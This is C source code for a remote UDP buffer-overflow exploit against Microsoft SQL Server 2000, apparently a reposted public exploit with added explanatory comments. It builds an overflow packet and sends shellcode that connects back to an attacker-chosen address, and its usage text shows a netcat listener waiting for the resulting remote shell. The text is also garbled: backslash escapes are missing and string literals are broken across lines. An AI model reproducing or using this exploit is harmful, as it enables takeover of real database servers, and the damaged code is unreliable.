For education only :-)
/*
MSSQL2000 Remote UDP Exploit!
Modified from "Advanced Windows Shellcode" by David Litchfield, [email]david@ngssoftware.com[/email]
fix a bug.
Modified by lion, [email]lion@cnhonker.net[/email]
Welcome to HUC Website
http://www.cnhonker.com */
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
// Forward declarations for the two helpers defined after main().
int GainControlOfSQL(void);
int StartWinsock(void);
// File-scope state shared by main(), StartWinsock() and GainControlOfSQL().
// The tool is single-threaded, so nothing here is synchronised.
struct sockaddr_in c_sa;      // declared but never referenced in this file
struct sockaddr_in s_sa;      // remote address: filled by StartWinsock(), port set in GainControlOfSQL()
struct hostent *he;           // gethostbyname() result; owned by Winsock, never freed here
SOCKET sock;                  // declared but never referenced (GainControlOfSQL() uses a local cli_sock)
unsigned long addr;           // declared but never referenced in this file
int SQLUDPPort=1434;          // destination UDP port used by GainControlOfSQL()
char host[256]="";            // argv[1]; zero-filled, main() copies at most 100 bytes into it
char request[4000]="x04";     // outgoing datagram, extended with strcat() in main()
char ping[8]="x02";           // short request sent instead when only a target is given (argc == 2)
// Payload that main() appends to the end of `request`. main() writes
// exploit_code[9] directly (service-pack selection) and patches the
// connect-back address (offsets 142-145) and port (offsets 160-161) in a
// copy held in its local `buffer`. As printed, the literal is split across
// line boundaries and is not valid C; it is left exactly as found.
char exploit_code[]=
" x55x8BxECx68x18x10xAEx42x68x1C
"
" x10xAEx42xEBx03x5BxEBx05xE8xF8
"
" xFFxFFxFFxBExFFxFFxFFxFFx81xF6
"
" xAExFExFFxFFx03xDEx90x90x90x90
"
" x90x33xC9xB1x44xB2x58x30x13x83
"
" xEBx01xE2xF9x43x53x8Bx75xFCxFF
"
" x16x50x33xC0xB0x0Cx03xD8x53xFF
"
" x16x50x33xC0xB0x10x03xD8x53x8B
"
" x45xF4x50x8Bx75xF8xFFx16x50x33
"
" xC0xB0x0Cx03xD8x53x8Bx45xF4x50
"
" xFFx16x50x33xC0xB0x08x03xD8x53
"
" x8Bx45xF0x50xFFx16x50x33xC0xB0
"
" x10x03xD8x53x33xC0x33xC9x66xB9
"
" x04x01x50xE2xFDx89x45xDCx89x45
"
" xD8xBFx7Fx01x01x01x89x7DxD4x40
"
" x40x89x45xD0x66xB8xFFxFFx66x35
"
" xFFxCAx66x89x45xD2x6Ax01x6Ax02
"
" x8Bx75xECxFFxD6x89x45xECx6Ax10
"
" x8Dx75xD0x56x8Bx5DxECx53x8Bx45
"
" xE8xFFxD0x83xC0x44x89x85x58xFF
"
" xFFxFFx83xC0x5Ex83xC0x5Ex89x45
"
" x84x89x5Dx90x89x5Dx94x89x5Dx98
"
" x8DxBDx48xFFxFFxFFx57x8DxBDx58
"
" xFFxFFxFFx57x33xC0x50x50x50x83
"
" xC0x01x50x83xE8x01x50x50x8Bx5D
"
" xE0x53x50x8Bx45xE4xFFxD0x33xC0
"
" x50xC6x04x24x61xC6x44x24x01x64
"
" x68x54x68x72x65x68x45x78x69x74
"
" x54x8Bx45xF0x50x8Bx45xF8xFFx10
"
" xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76
"
" x3Cx34x34x58x58x33x3Dx2Ax36x3D
"
" x34x6Bx6Ax76x3Cx34x34x58x58x58
"
" x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C
"
" x19x58x58x3Bx37x36x36x3Dx3Bx2C
"
" x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37
"
" x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C
"
"x58";
// Entry point. argc == 2: send the short `ping` request to argv[1].
// argc == 5: build the overflow request from argv[2..4] (connect-back host,
// connect-back port, service-pack selector) and send it. Any other count
// prints usage. Returns 0 on every path; GainControlOfSQL()'s result is
// never inspected, and StartWinsock() may exit(-1) on its own.
int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;    // len and c are never used
int count = 0;                           // never used
char sc[300]="";                         // never used
char ipaddress[40]="";                   // argv[2]; at most 36 bytes copied in
unsigned short port = 0;                 // argv[3] via atoi()
unsigned int ip = 0;                     // ipaddress as returned by inet_addr()
char *ipt="";                            // byte view of ip
char buffer[400]="";                     // working copy of exploit_code that gets patched
unsigned short prt=0;                    // port after htons() and ^0xFFFF
char *prtt="";                           // byte view of prt
if(argc != 2 && argc != 5)
{
printf(" ========================================
=======================rn");
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn");
printf("Modified from "Advanced Windows Shellcode"rn");
printf("Code by David Litchfield, [email]david@ngssoftware.com[/email]rn");
printf("Modified by lion, fix a bug.rn");
printf("Welcome to HUC Website
http://www.cnhonker.comrnn");
printf("Usage:rn");
printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]);
printf("Exemple:rn");
printf("Target is MSSQL SP 0:rn");
printf(" C:\>nc -l -p 53rn");
printf(" C:\>%s db.target.com 202.202.202.202 53 0rn",argv[0]);
printf("Target is MSSQL SP 1 or 2:rn");
printf(" c:\>%s db.target.com 202.202.202.202rnn", argv[0]);
return 0;
}
// host is 256 bytes and zero-initialised, so copying at most 100 keeps it
// NUL-terminated even though strncpy() itself guarantees no terminator.
strncpy(host, argv[1], 100);
if(argc == 5)
{
// Same pattern: at most 36 bytes into a zero-filled 40-byte array.
strncpy(ipaddress, argv[2], 36);
// atoi() reports no errors: a non-numeric argv[3] yields port 0 and an
// out-of-range value is truncated to unsigned short. Neither <stdlib.h>
// nor <ctype.h> is included above, so atoi()/exit()/isalpha() rely on
// <winsock2.h> pulling them in transitively, or on implicit declaration.
port = atoi(argv[3]);
// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly
// Only the first character of argv[4] is inspected ('0' == 0x30); any
// other value, including a typo, falls through to the SP 1/2 branch.
if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn");
exploit_code[9]=0x10;    // patches the global in place, before it is copied to buffer
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn");
}
}
// StartWinsock() returns 1 on success and 0 on WSAStartup failure; a
// hostname that fails to resolve makes it exit(-1) without returning here.
ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.rn");
return 0;
}
if(argc == 2)
{
// Replace the request prefix with the short ping; GainControlOfSQL()'s
// return value is discarded.
strcpy(request,ping);
GainControlOfSQL();
return 0;
}
// Unbounded copy into a 400-byte buffer; exploit_code's length is never
// compared against it.
strcpy(buffer,exploit_code);
// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);    // INADDR_NONE on malformed input is not detected
ipt = (char*)&ip;
// The four address bytes land at fixed offsets of the copy; nothing checks
// that buffer actually holds that many bytes of payload.
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons(port);
prt = prt ^ 0xFFFF;     // bitwise inverse of the network-order port
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];
// request[4000] has ample room for the fixed-size pieces below; none of the
// strcat() calls check. GainControlOfSQL() sends strlen(request) bytes, so
// anything after an embedded NUL would not be transmitted.
strcat(request," AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT
UUUUVVVVWWWWXXXX");
// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump
strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address
// SQL 2000 no service packs needs the address here
strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here
strcat(request,"x01x70xAEx42");
// just a few nops
strcat(request,"x90x90x90x90x90x90x90x90");
// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);
GainControlOfSQL();    // result ignored; outcome is only reported via stdout
return 0;
}
// Initialises Winsock 2.1 and resolves the global `host` into s_sa.
// Returns 1 on success, 0 if WSAStartup() fails or reports a version other
// than 2.1. A hostname that does not resolve terminates the process with
// exit(-1) instead of returning. Called once from main() before any socket
// is created; s_sa.sin_port is filled in later by GainControlOfSQL().
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2,1);
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
{
printf("error WSAStartup 1.rn");
return 0;
}
// Exact-version check: anything other than 2.1 is rejected.
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
{
printf("error WSAStartup 2.rn");
WSACleanup( );
return 0;
}
// Crude hostname-vs-dotted-quad test on the first character only. An empty
// host (host[0] == 0) takes the else branch. isalpha() receives a plain
// char; a negative value (high-bit byte) is undefined for <ctype.h>
// functions (CERT STR37-C), so an (unsigned char) cast is the safe form.
if (isalpha(host[0]))
{
he = gethostbyname(host);
if (he == NULL)
{
printf("Can't get the ip of %s!rn", host);
WSACleanup( );
exit(-1);    // terminates the process here; main() never sees a failure code
}
s_sa.sin_addr.s_addr=INADDR_ANY;    // immediately overwritten by the memcpy() below
s_sa.sin_family=AF_INET;
// Copies h_length bytes into the 4-byte sin_addr: correct for AF_INET
// (h_length == 4) but not checked. Only h_addr, the first resolved
// address, is used.
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
s_sa.sin_family=AF_INET;
// inet_addr() returns INADDR_NONE for malformed input; the value is not
// checked and would be used as the destination address as-is.
s_sa.sin_addr.s_addr = inet_addr(host);
}
return 1;
}
// Sends the global `request` to s_sa over UDP and prints whatever single
// datagram comes back within the receive timeout. On socket/bind/connect
// failure it returns printf()'s result (a positive byte count); on the
// normal path it returns 0. Both callers in main() ignore the result.
int GainControlOfSQL(void)
{
char resp[600]="";                 // zero-filled so the reply printed below is always NUL-terminated
int snd=0,rcv=0,count=0, var=0;    // var is never used; snd is stored but never checked
unsigned int ttlbytes=0;           // never used
unsigned int to=2000;              // SO_RCVTIMEO value; a DWORD in milliseconds on Winsock
struct sockaddr_in cli_addr;       // not zeroed: sin_zero is left uninitialised
SOCKET cli_sock;
cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erronrn");
}
cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
// Fixed local source port 53: bind() fails if another process already has
// UDP/53, and the constant source port is a network-visible artifact of this
// tool (useful for detection signatures).
cli_addr.sin_port=htons((unsigned short)53);
// Return value unchecked; if the option is not applied, recv() below has
// no timeout and blocks until a datagram arrives.
setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIM
EO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)& cli_addr,sizeof(cli_addr))==SOCKET_ERROR
)
{
// NOTE: cli_sock is leaked on this path (no closesocket()).
return printf("bind error");
}
// The destination port is set here, not in StartWinsock().
s_sa.sin_port=htons((unsigned short)SQLUDPPort);
// connect() on a UDP socket only fixes the peer address for send()/recv();
// no packet is exchanged by it.
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
// NOTE: cli_sock is leaked on this path as well.
return printf("Connect error");
}
else
{
// The request is sent as a C string: bytes from the first NUL onwards
// are not transmitted. send()'s return value is stored but never checked.
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!rn");
printf("If you don't have a shell it didn't work.rn");
// Reads at most 596 of the 600 bytes so the trailing zero-fill keeps
// printf("%s") bounded. SOCKET_ERROR (e.g. timeout) and replies of 0 or 1
// byte are silently ignored by the check below.
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
// Replace embedded NULs with spaces so the whole reply prints.
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);
return 0;
}